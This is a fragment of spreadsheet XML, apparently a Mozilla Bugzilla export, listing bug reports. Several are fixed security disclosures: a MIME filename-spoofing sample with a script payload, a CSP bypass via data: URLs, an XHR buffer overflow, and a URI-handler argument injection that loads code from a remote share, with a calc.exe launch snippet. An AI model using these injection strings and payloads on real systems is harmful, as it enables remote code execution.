      </c>
      <c r="P2496" t="inlineStr"/>
      <c r="Q2496" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2496" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2496" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2496" t="n">
        <v>1</v>
      </c>
      <c r="U2496" t="n">
        <v>0</v>
      </c>
      <c r="V2496" t="n">
        <v>3</v>
      </c>
      <c r="W2496" t="inlineStr">
        <is>
          <t>We need to run a compatibility bump for all Thunderbird add-ons from version 6 to 7. Pretty much the same rules for Firefox apply to Thunderbird.
In most cases we shouldn't be bumping an extension's compatibility for Thunderbird if Firefox didn't bump it for 6 -&gt; 7, but can we get a list of those for me to review?
The initial list of interface changes specific to Thunderbird for 6 -&gt; 7 are:
- nsIMsgThread::GetChildAt has been removed (bug 617839)
Additional detections we should do at javascript level:
- Global variables removal (bug 458548):
-- gMessengerBundle
-- gBrandBundle
- Function removals (bug 657856):
-- createNewAttachmentInfo
-- saveAttachment
-- attachmentIsEmpty
-- openAttachment
-- detachAttachment
-- cloneAttachment
- File removal (bug 621213):
-- dictUtils.js has been removed, use Dict.jsm instead.
We also need to consider some rdf removals in the address book, I'm currently working out what we need to do there.</t>
        </is>
      </c>
      <c r="X2496" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2497">
      <c r="A2497" t="n">
        <v>505592</v>
      </c>
      <c r="B2497" t="inlineStr">
        <is>
          <t>2009-07-21 17:02:32 -0700</t>
        </is>
      </c>
      <c r="C2497" t="inlineStr">
        <is>
          <t>add_see_also and remove_see_also don't call check_can_change_field</t>
        </is>
      </c>
      <c r="D2497" t="inlineStr">
        <is>
          <t>2009-07-22 19:17:10 -0700</t>
        </is>
      </c>
      <c r="E2497" t="n">
        <v>1</v>
      </c>
      <c r="F2497" t="n">
        <v>1</v>
      </c>
      <c r="G2497" t="n">
        <v>4</v>
      </c>
      <c r="H2497" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2497" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2497" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2497" t="inlineStr">
        <is>
          <t>3.3.4</t>
        </is>
      </c>
      <c r="L2497" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2497" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2497" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2497" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2497" t="inlineStr"/>
      <c r="Q2497" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2497" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2497" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T2497" t="n">
        <v>1</v>
      </c>
      <c r="U2497" t="n">
        <v>0</v>
      </c>
      <c r="V2497" t="n">
        <v>4</v>
      </c>
      <c r="W2497" t="inlineStr">
        <is>
          <t>Anybody is allowed to modify the see_also field currently, without any permission checks (other than their ability to see the bug and canedit on the product, of course), because they don't call check_can_change_field.
I don't consider this a security bug, I just consider it an incomplete implementation. That is, in versions of Bugzilla before 3.4 final, users could update the see_also field without any permission checks, but I've decided to change that.</t>
        </is>
      </c>
      <c r="X2497" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2498">
      <c r="A2498" t="n">
        <v>1411732</v>
      </c>
      <c r="B2498" t="inlineStr">
        <is>
          <t>2017-10-25 13:24:33 -0700</t>
        </is>
      </c>
      <c r="C2498" t="inlineStr">
        <is>
          <t>TBE-01-009: Filename Spoofing for external Attachments</t>
        </is>
      </c>
      <c r="D2498" t="inlineStr">
        <is>
          <t>2020-02-16 17:13:26 -0800</t>
        </is>
      </c>
      <c r="E2498" t="n">
        <v>1</v>
      </c>
      <c r="F2498" t="n">
        <v>1</v>
      </c>
      <c r="G2498" t="n">
        <v>3</v>
      </c>
      <c r="H2498" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2498" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J2498" t="inlineStr">
        <is>
          <t>Attachments</t>
        </is>
      </c>
      <c r="K2498" t="inlineStr">
        <is>
          <t>57</t>
        </is>
      </c>
      <c r="L2498" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2498" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2498" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2498" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2498" t="inlineStr">
        <is>
          <t>[bug 1411716 fixes]</t>
        </is>
      </c>
      <c r="Q2498" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2498" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2498" t="inlineStr">
        <is>
          <t>Thunderbird 61.0</t>
        </is>
      </c>
      <c r="T2498" t="n">
        <v>1</v>
      </c>
      <c r="U2498" t="n">
        <v>0</v>
      </c>
      <c r="V2498" t="n">
        <v>30</v>
      </c>
      <c r="W2498" t="inlineStr">
        <is>
          <t>Thunderbird implements external attachments via the X-Mozilla-External- Attachment-URL. The actual resource is specified via this header. It was discovered that the GUI displays the filename outlined in the “Content-Type” header, which is not related to the real resource. This can be abused to trick the user into opening an attachment, believing that this item is a safe resource like an image, HTML file or similar. Conversely, as illustrated next, Thunderbird would fetch a completely different file
--------------A320A96F6639F3C578F35383
Content-Type: message/external-body; access-type=whatever;
name="NameWhichIsShownInTheGui.html"
X-Mozilla-External-Attachment-URL: data:application/pdf,aaaaaaaaaaaaaaaaaaaaa
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="thisigui3.html"
Content-Transfer-Encoding: binary
Cure53, Berlin · 10/11/17
[Ghost Body1234]&lt;h1&gt;asdf&lt;/h1&gt;&lt;script&gt;alert(1)&lt;/script&gt;
One solution to this problem would be to display a warning box to the user before fetching the external resource, making user clearly aware of the potential risks. Another approach could be to extract the filename via the X-Mozilla-External-Attachment-URL instead of the Content-Type header.
For the original report as PDF; see bug 1411701.</t>
        </is>
      </c>
      <c r="X2498" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2499">
      <c r="A2499" t="n">
        <v>490818</v>
      </c>
      <c r="B2499" t="inlineStr">
        <is>
          <t>2009-04-30 05:44:08 -0700</t>
        </is>
      </c>
      <c r="C2499" t="inlineStr">
        <is>
          <t>Packed JS that works in Firefox 3.0 and all other browsers fails in Firefox 3.5</t>
        </is>
      </c>
      <c r="D2499" t="inlineStr">
        <is>
          <t>2009-06-24 11:42:56 -0700</t>
        </is>
      </c>
      <c r="E2499" t="n">
        <v>1</v>
      </c>
      <c r="F2499" t="n">
        <v>1</v>
      </c>
      <c r="G2499" t="n">
        <v>3</v>
      </c>
      <c r="H2499" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2499" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2499" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2499" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L2499" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2499" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2499" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2499" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2499" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q2499" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2499" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2499" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T2499" t="n">
        <v>1</v>
      </c>
      <c r="U2499" t="n">
        <v>0</v>
      </c>
      <c r="V2499" t="n">
        <v>17</v>
      </c>
      <c r="W2499" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
I've been using http://smallsharptools.com/Downloads/SmallSharpTools.Packer/SmallSharpTools.Packer-4.0.3-Setup.msi to pack my JavaScript file for a few months (it's an offline variation of http://dean.edwards.name/packer/) and it works fine in all recent browsers, but it fails in Firefox 3.5 beta 4.
I've tried to remove as much of the code as possible before submitting it, to make it easier to debug. The empty functions I've put in are necessary to make it fail.
Reproducible: Always
Steps to Reproduce:
1. Open the attached HTML file.
Actual Results:  
Error: theMatrix is not a constructor
Source File: FF35TestCase.html
Line: 8
Expected Results:  
No error.</t>
        </is>
      </c>
      <c r="X2499" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2500">
      <c r="A2500" t="n">
        <v>1170809</v>
      </c>
      <c r="B2500" t="inlineStr">
        <is>
          <t>2015-06-02 15:48:02 -0700</t>
        </is>
      </c>
      <c r="C2500" t="inlineStr">
        <is>
          <t>Overflow in nsXMLHttpRequest::AppendToResponseText causes memory-safety bug</t>
        </is>
      </c>
      <c r="D2500" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:53 -0700</t>
        </is>
      </c>
      <c r="E2500" t="n">
        <v>1</v>
      </c>
      <c r="F2500" t="n">
        <v>1</v>
      </c>
      <c r="G2500" t="n">
        <v>3</v>
      </c>
      <c r="H2500" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2500" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2500" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2500" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L2500" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2500" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2500" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2500" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2500" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+][adv-esr31.8+]</t>
        </is>
      </c>
      <c r="Q2500" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2500" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2500" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T2500" t="n">
        <v>1</v>
      </c>
      <c r="U2500" t="n">
        <v>0</v>
      </c>
      <c r="V2500" t="n">
        <v>43</v>
      </c>
      <c r="W2500" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150305021524
Steps to reproduce:
nsXMLHttpRequest::AppendToResponseText (38.0.1\dom\base\nsXMLHttpRequest.cpp) can write to memory that it does not own:
665: nsresult
666: nsXMLHttpRequest::AppendToResponseText(const char * aSrcBuffer,
667:                                       uint32_t aSrcBufferLen)
668: {
669:   NS_ENSURE_STATE(mDecoder);
670:
671:   int32_t destBufferLen;
672:   nsresult rv = mDecoder-&gt;GetMaxLength(aSrcBuffer, aSrcBufferLen,
673:                                        &amp;destBufferLen);
674:   NS_ENSURE_SUCCESS(rv, rv);
675:
676:   if (!mResponseText.SetCapacity(mResponseText.Length() + destBufferLen, fallible)) {
677:     return NS_ERROR_OUT_OF_MEMORY;
678:   }
679:
680:   char16_t* destBuffer = mResponseText.BeginWriting() + mResponseText.Length();
681:
682:   int32_t totalChars = mResponseText.Length();
683:
684:   // This code here is basically a copy of a similar thing in
685:   // nsScanner::Append(const char* aBuffer, uint32_t aLen).
686:   int32_t srclen = (int32_t)aSrcBufferLen;
687:   int32_t destlen = (int32_t)destBufferLen;
688:   rv = mDecoder-&gt;Convert(aSrcBuffer,
689:                          &amp;srclen,
690:                          destBuffer,
691:                          &amp;destlen);
692:   ...
The bug is in line 676. If mResponseText.Length() + destBufferLen overflows, line 676 will SetCapacity to a value smaller than mResponseText's current length. The remaining code will then write data beginning at the _end_ of the buffer (mResponseText.BeginWriting() + mResponseText.Length()).
Since the response text from an XMLHttpRequest is under external control, this bug could be leveraged to corrupt Firefox's address space, possibly causing execution of attacker-chosen code.
Presumably this problem can occur only under 64-bit OSes.</t>
        </is>
      </c>
      <c r="X2500" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2501">
      <c r="A2501" t="n">
        <v>1457100</v>
      </c>
      <c r="B2501" t="inlineStr">
        <is>
          <t>2018-04-26 03:37:16 -0700</t>
        </is>
      </c>
      <c r="C2501" t="inlineStr">
        <is>
          <t>CSP: embedding resource's policy does not affect data: URL documents loaded via OBJECT elements</t>
        </is>
      </c>
      <c r="D2501" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:21 -0800</t>
        </is>
      </c>
      <c r="E2501" t="n">
        <v>1</v>
      </c>
      <c r="F2501" t="n">
        <v>1</v>
      </c>
      <c r="G2501" t="n">
        <v>3</v>
      </c>
      <c r="H2501" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2501" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2501" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2501" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2501" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2501" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2501" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2501" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2501" t="inlineStr">
        <is>
          <t>[domsecurity-active][post-critsmash-triage][adv-main76+]</t>
        </is>
      </c>
      <c r="Q2501" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2501" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2501" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T2501" t="n">
        <v>1</v>
      </c>
      <c r="U2501" t="n">
        <v>0</v>
      </c>
      <c r="V2501" t="n">
        <v>10</v>
      </c>
      <c r="W2501" t="inlineStr">
        <is>
          <t>Step to reproduce:
1. Navigate the following data URL (or create a HTML document with the same content and navigate it):
data:text/html,&lt;meta http-equiv="Content-security-policy" content="script-src none;"/&gt;&lt;script&gt;alert(location)&lt;/script&gt;&lt;object data="data:text/html,object&lt;script&gt;alert('object')&lt;/script&gt;"&gt;&lt;/object&gt;&lt;iframe src="data:text/html,iframe&lt;script&gt;alert('frame')&lt;/script&gt;"&gt;&lt;/iframe&gt;
Expected result: no JavaScript gets executed (no alert is shown)
Actual result: one alert saying "object" is shown
This demonstrates that the iframe's document inherits parent's CSP, but the object's document doesn't. According to https://www.w3.org/TR/CSP2/#which-policy-applies they should behave the same way, i.e. being governed by "the policy of the embedding resource".
This can be also used to bypass WebExtensions relying on CSP to block scripts: even though the embedded document has null origin, it could deliver a self-contained exploit.</t>
        </is>
      </c>
      <c r="X2501" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2502">
      <c r="A2502" t="n">
        <v>1530103</v>
      </c>
      <c r="B2502" t="inlineStr">
        <is>
          <t>2019-02-23 07:47:33 -0800</t>
        </is>
      </c>
      <c r="C2502" t="inlineStr">
        <is>
          <t>URI handler Remote Code Execution via command line parameter injection in Firefox</t>
        </is>
      </c>
      <c r="D2502" t="inlineStr">
        <is>
          <t>2024-05-30 09:56:51 -0700</t>
        </is>
      </c>
      <c r="E2502" t="n">
        <v>1</v>
      </c>
      <c r="F2502" t="n">
        <v>1</v>
      </c>
      <c r="G2502" t="n">
        <v>3</v>
      </c>
      <c r="H2502" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2502" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2502" t="inlineStr">
        <is>
          <t>Startup and Profile System</t>
        </is>
      </c>
      <c r="K2502" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2502" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2502" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2502" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2502" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2502" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main66+][adv-esr60.6+]</t>
        </is>
      </c>
      <c r="Q2502" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2502" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2502" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T2502" t="n">
        <v>1</v>
      </c>
      <c r="U2502" t="n">
        <v>0</v>
      </c>
      <c r="V2502" t="n">
        <v>29</v>
      </c>
      <c r="W2502" t="inlineStr">
        <is>
          <t>Tested on Microsoft Windows 10 Enterprise version 10.0.17134 Build 17134
Using Firefox Quantum version 65.0.1 (64-bit)
Steps to reproduce:
1. Close all running instances of firefox
2. Open the run prompt (windows key + r) and run the following URL:
`https://www.tsscyber.com.au#" -greomni "\\remoteHost\omni.ja" -appomni "\\remoteHost\omni2.ja`
---
Expected Result: Firefox ignores the command as additional command line arguments are present.
Actual Result: Firefox accepts the command and attempts to retrieve ‘omni.ja’ and ‘omni2.ja’ from ‘remoteHost’. As ‘remoteHost’ likely doesn’t resolve to an IP, firefox crashes and ‘crashreporter.exe’ is run. 
---
Detailed Information:
A malicious user can craft URIs in third party applications (tested using MS Outlook and MS Office) that can result in Remote Code Execution when Firefox is installed and configured as the default URI handler for a given URI scheme (e.g. http/https).
The ‘greomni’ and ‘appomni’ command line arguments are accepted via the URI handler command. These flags are used to specify the location of the ‘omni.ja’ file. An attacker can specify a network location for the ‘greomni’ and ‘appomni’ arguments to force Firefox to load malicious ‘omni.ja’ files. Some information about the 'omni.ja' files can be found here: https://developer.mozilla.org/en-US/docs/Mozilla/About_omni.ja_(formerly_omni.jar) 
The shell command for HTTP URI’s is specified in the windows registry in an entry similar to:
Computer\HKEY_CLASSES_ROOT\FirefoxHTML-308046B0AF4A39CB\shell\open\command
The value is:
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1"
When the example malicious URL above is clicked, the command becomes:
`"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://www.tsscyber.com.au#" -greomni "\\remoteHost\omni.ja" -appomni "\\remoteHost\omni2.ja"`
This issue can be exploited from Outlook and Office because they don’t URL Encode the hash segment of a URL making it possible to inject double quotes into the command. There are likely other programs that have similar behaviours.
The ‘osint’ flag in the command is supposed to ensure that Firefox ignores any command line arguments that have been injected via a malicious URL. The ‘osint’ flag was introduced in 2007 in response to the following bug: https://bugzilla.mozilla.org/show_bug.cgi?id=384384 
I think that the issue occurs because the ‘greomni’ and ‘appomni’ command line arguments are used to retrieve the omni.ja files before the ‘osint’ flag is checked. The  ‘greomni’ and ‘appomni’ arguments are then hidden from the ‘osint’ check because argc’s value is reduced by  two. This means that  when the ‘osint’ check is performed later, the value of argc matches the acceptable amount of command line arguments the ‘osint’ flag expects. 
This is the area of code that I think is causing the issue:
https://dxr.mozilla.org/mozilla-central/source/js/xpconnect/src/XPCShellImpl.cpp#1267
I believe this is where the ‘osint’ flag is being checked:
https://dxr.mozilla.org/mozilla-central/source/browser/components/nsBrowserContentHandler.js#648
RCE is achieved by introducing malicious code into the contents of files in the omni.ja archives. We have had limited success launching arbitrary executables by injecting the following code into .js and .jws files (for example C:\Program Files (x86)\Mozilla Firefox\browser\omni.ja’s /chrome/browser/content/browser/browser.js file).
Components.utils.import("resource://gre/modules/Subprocess.jsm")
let opt = { command: "C:\\windows\\system32\\calc.exe", arguments: [], workdir: "C:\\windows\\system32", stderr: "pipe"};
let x = Subprocess.call(opt);
Credit:
Joshua Graham of TSS &amp; Brendan Scarvell</t>
        </is>
      </c>
      <c r="X2502" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2503">
      <c r="A2503" t="n">
        <v>1407570</v>
      </c>
      <c r="B2503" t="inlineStr">
        <is>
          <t>2017-10-11 03:10:21 -0700</t>
        </is>
      </c>
      <c r="C2503" t="inlineStr">
        <is>
          <t>Google Meet doesn't support Firefox</t>
        </is>
      </c>
      <c r="D2503" t="inlineStr">
        <is>
          <t>2019-02-15 06:28:27 -0800</t>
        </is>
      </c>
      <c r="E2503" t="n">
        <v>1</v>
      </c>
      <c r="F2503" t="n">
        <v>1</v>
      </c>
      <c r="G2503" t="n">
        <v>2</v>
      </c>
      <c r="H2503" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2503" t="inlineStr">
        <is>
          <t>Web Compatibility</t>
        </is>
      </c>
      <c r="J2503" t="inlineStr">
        <is>
          <t>Site Reports</t>
        </is>
      </c>
      <c r="K2503" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2503" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2503" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2503" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2503" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2503" t="inlineStr"/>
      <c r="Q2503" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2503" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2503" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2503" t="n">
        <v>1</v>
      </c>
      <c r="U2503" t="n">
        <v>0</v>
      </c>
      <c r="V2503" t="n">
        <v>6</v>
      </c>
      <c r="W2503" t="inlineStr">
        <is>
          <t>If you open meet.google.com, you get redirected to https://meet.google.com/unsupported?ref=https://meet.google.com/, a page that says Firefox is not yet compatible with Meet and prompts you to download Chrome.</t>
        </is>
      </c>
      <c r="X2503" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2504">
      <c r="A2504" t="n">
        <v>917380</v>
      </c>
      <c r="B2504" t="inlineStr">
        <is>
          <t>2013-09-17 09:39:55 -0700</t>
        </is>
      </c>
      <c r="C2504" t="inlineStr">
        <is>
          <t>Extended validation root certificates are trusted even if the user has explicitly removed their trust</t>
        </is>
      </c>
      <c r="D2504" t="inlineStr">
        <is>
          <t>2024-05-30 08:07:34 -0700</t>
        </is>
      </c>
      <c r="E2504" t="n">
        <v>1</v>
      </c>
      <c r="F2504" t="n">
        <v>1</v>
      </c>
      <c r="G2504" t="n">
        <v>3</v>
      </c>
      <c r="H2504" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2504" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2504" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K2504" t="inlineStr">
        <is>
          <t>26 Branch</t>
        </is>
      </c>
      <c r="L2504" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2504" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2504" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2504" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2504" t="inlineStr">
        <is>
          <t>[adv-main26+][adv-esr24.2+] Doesn't affect most users, high for those under targeted attack</t>
        </is>
      </c>
      <c r="Q2504" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2504" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2504" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T2504" t="n">
        <v>1</v>
      </c>
      <c r="U2504" t="n">
        <v>0</v>
      </c>
      <c r="V2504" t="n">
        <v>68</v>
      </c>
      <c r="W2504" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Stop!Hacker!; rv:24.0) Gecko/20130524 Firefox/24.0 (Nightly/Aurora)
Build ID: 20130917030214
Steps to reproduce:
This is in firefox nightly build 26.0a1. I tried to open a website that has a secure connection. However, something strange happened. 
Actual results:
When I tried to open a website signed by Entrust, Inc. Although I edit the CA settings in the certificate manager that this certificate is not trusted, the connection will still go through without showing “The connection is untrusted". Also, when I opened the certificate manager and change a CA settings, I closed it, firefox will crash after I reopen certificate manager.
Test Website: https://order.dominos.com/en/pages/order/menu.jsp#/menu/category/all/
With "Entrust Inc" Root certificate untrusted, the certificate is still trusted.
Expected results:
It should appear "The connection is untrusted, because the root certificate is untrusted."</t>
        </is>
      </c>
      <c r="X2504" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2505">
      <c r="A2505" t="n">
        <v>529087</v>
      </c>
      <c r="B2505" t="inlineStr">
        <is>
          <t>2009-11-16 12:18:39 -0800</t>
        </is>
      </c>
      <c r="C2505" t="inlineStr">
        <is>
          <t>Crash [@ nsXBLBinding::AllowScripts]</t>
        </is>
      </c>
      <c r="D2505" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:49 -0700</t>
        </is>
      </c>
      <c r="E2505" t="n">
        <v>1</v>
      </c>
      <c r="F2505" t="n">
        <v>1</v>
      </c>
      <c r="G2505" t="n">
        <v>3</v>
      </c>
      <c r="H2505" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2505" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2505" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K2505" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2505" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2505" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2505" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2505" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2505" t="inlineStr">
        <is>
          <t>[sg:critical?][ccbr][critsmash:patch] [qa-needs-str]</t>
        </is>
      </c>
      <c r="Q2505" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2505" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2505" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2505" t="n">
        <v>1</v>
      </c>
      <c r="U2505" t="n">
        <v>0</v>
      </c>
      <c r="V2505" t="n">
        <v>26</v>
      </c>
      <c r="W2505" t="inlineStr">
        <is>
          <t>It's ranked #276 in the 3.5.5 (past 7 days) top crash list:
http://crash-stats.mozilla.com/topcrasher/byversion/Firefox/3.5.5/7
with 389 crashes, 380 on Win, 9 on OSX.
stack:
nsXBLBinding::AllowScripts               content/xbl/src/nsXBLBinding.cpp:1380
nsXBLBinding::ExecuteAttachedHandler     content/xbl/src/nsXBLBinding.cpp:977
nsXBLBinding::ExecuteAttachedHandler     content/xbl/src/nsXBLBinding.cpp:975
nsRunnableMethod&lt;nsFileUploadContentStream&gt;::Run   xpcom/nsThreadUtils.h:278
nsContentUtils::RemoveScriptBlocker   content/base/src/nsContentUtils.cpp:4344
PresShell::DoFlushPendingNotifications	layout/base/nsPresShell.cpp:4842
PresShell::FlushPendingNotifications	layout/base/nsPresShell.cpp:4798
nsDocument::FlushPendingNotifications	content/base/src/nsDocument.cpp:6375
nsQueryReferent::operator	nsWeakReference.cpp:88
nsComputedDOMStyle::GetPropertyCSSValue layout/style/nsComputedDOMStyle.cpp:349
xul.dll@0x8c4807	
There are also 2 crashes on trunk within the past week, so it appears
the bug hasn't been fixed yet.</t>
        </is>
      </c>
      <c r="X2505" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2506">
      <c r="A2506" t="n">
        <v>1639734</v>
      </c>
      <c r="B2506" t="inlineStr">
        <is>
          <t>2020-05-20 15:54:05 -0700</t>
        </is>
      </c>
      <c r="C2506" t="inlineStr">
        <is>
          <t>Crash in [@ rtc::VideoBroadcaster::OnFrame]</t>
        </is>
      </c>
      <c r="D2506" t="inlineStr">
        <is>
          <t>2021-06-11 04:14:38 -0700</t>
        </is>
      </c>
      <c r="E2506" t="n">
        <v>1</v>
      </c>
      <c r="F2506" t="n">
        <v>1</v>
      </c>
      <c r="G2506" t="n">
        <v>3</v>
      </c>
      <c r="H2506" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2506" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2506" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
